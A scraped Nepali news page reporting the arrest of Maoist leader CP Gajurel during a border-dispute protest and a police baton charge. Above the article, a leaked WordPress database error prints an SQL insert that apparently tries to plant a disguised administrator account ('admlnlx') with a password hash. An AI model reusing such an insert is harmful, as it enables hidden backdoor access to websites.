WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BtpvMx9AQvKk3JIfvjN6S8pvdmgkMB0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:18:42', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाडौँ । नेकपा (क्रान्तिकारी माओवादी)का नेता सीपी गजुरेल पक्राउ परेका छन् । आईतवार सीमा विवादसम्बन्धी उपप्रधान एवं रक्षामन्त्री ईश्वर पोखरेललाई ज्ञापन पत्र बुझाउन जाने क्रममा गजुरेल पक्राउ परेका हुन ।
नेपाल पुलिस क्लबबाटै गजुरेलले सीमा विवादसम्बन्धी आफूहरुले शान्तिपूर्ण रुपमा उपप्रधान तथा रक्षामन्त्री ईश्वर पोख्रेललाई भेट्न जाँदा आफूहरुलाई पक्राउ गरिएको जनाएको छ ।
‘हामी शान्तिपूर्ण रुपमा उपप्रधानमन्त्री ईश्वर पोखरेललाई भेट्न जाँदै थियौँ । माथिको आदेश हो भन्दै हामीलाई वरै रोकियो । हनुमानस्थान पुग्नुभन्दा पहिले नै प्रहरीले हामीलाई रोक्यो, त्यहीँ हामीहरुमाथि लाठीचार्ज भयो’, गजुरेलले भने । गजुरेलले पार्टीका केही नेता तथा कार्यकर्ता घाइते भएको पनि जानकारी दिए ।
sourse:kantipur